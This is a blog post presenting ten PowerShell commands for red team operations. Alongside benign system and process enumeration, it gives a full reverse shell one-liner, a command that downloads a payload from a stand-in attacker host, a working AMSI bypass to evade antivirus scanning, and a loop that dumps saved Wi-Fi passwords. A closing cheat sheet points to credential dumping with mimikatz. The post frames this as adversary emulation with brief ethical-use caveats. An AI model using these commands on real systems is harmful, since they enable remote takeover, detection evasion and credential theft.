⚔️ Top 10 PowerShell Commands Every Red Teamer Should Know (2025 Edition)
“Attackers don’t bring malware; they bring PowerShell.” – Every SOC Analyst Ever
PowerShell has become a critical weapon in a red teamer's arsenal. Native to Windows, stealthy, and powerful, it’s the perfect post-exploitation and recon tool. In this blog, we’ll cover 10 practical PowerShell commands, what they do, and when/how to use them effectively in red team operations or adversary emulation.
π 1. System Info Discovery
Get-ComputerInfo | Select-Object CsName, WindowsVersion, OsName, OsArchitecture
This command fetches essential target system info – great for situational awareness once you have code execution.
πΈ️ 2. Network Recon
Get-NetTCPConnection | Group-Object State
Shows all active TCP connections and their states. Helps identify open ports, listeners, or suspicious persistence.
π₯ 3. Enumerate Domain Users
Get-ADUser -Filter * | Select-Object Name,SamAccountName,Enabled
Pulls all domain users from AD (requires RSAT module or AD shell). Helps find high-value targets.
π‘ Tip: Use this after pivoting into a domain-joined machine.
π 4. Extract Saved Wi-Fi Passwords
(netsh wlan show profiles) |
ForEach-Object {
$profile = ($_ -split ':')[1].Trim()
netsh wlan show profile $profile key=clear
}
Grabs saved wireless network passwords—useful for lateral movement in hybrid environments.
π£ 5. Invoke-WebRequest for Payload Delivery
Invoke-WebRequest -Uri http://evil.com/payload.exe -OutFile payload.exe
Downloads files from remote servers. Useful in post-exploitation to pull second-stage malware or tools.
π 6. Reverse Shell One-Liner
powershell -nop -w hidden -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.10',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}"
This is a weaponized reverse shell payload in one line. Use wisely in labs or approved test environments.
π¦ 7. Bypass AMSI (Antimalware Scan Interface)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Bypasses Windows Defender AMSI, allowing potentially malicious scripts to run undetected (until caught π).
⚠️ Ethical use only – don’t misuse this.
π️ 8. Enumerate All Running Processes
Get-Process | Sort-Object CPU -Descending | Select-Object -First 10
Useful to identify high CPU processes (possibly AV or forensic tools) or background services of interest.
π 9. List All Services (Check for Misconfig)
Get-Service | Where-Object {$_.Status -eq "Running"} | Select Name, DisplayName, Status
Look for misconfigured or vulnerable services (like weak ACLs) for potential service hijacking.
π 10. ScriptBlock Logging & Security Checks
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational"
Use this to check whether your commands are being logged. Defensive testing is just as important as offense.
π§ Final Thoughts
PowerShell is native, powerful, and deadly in the wrong hands. Understanding its full capabilities lets you better emulate advanced adversaries—and also defend against them.
✅ Learn. Practice. Simulate.
Train in safe environments like:
π Bonus: PowerShell Red Team Cheat Sheet
| Category | Command Example |
|---|---|
| Recon | systeminfo, ipconfig /all |
| User enum | net user, Get-LocalUser |
| Credential dump | mimikatz, Get-ADReplAccount |
| File transfer | Invoke-WebRequest, CertUtil |
| Shells | powershell reverse shell, nishang |
| AV Evasion | AMSI bypass, obfuscation |
Comments
Post a Comment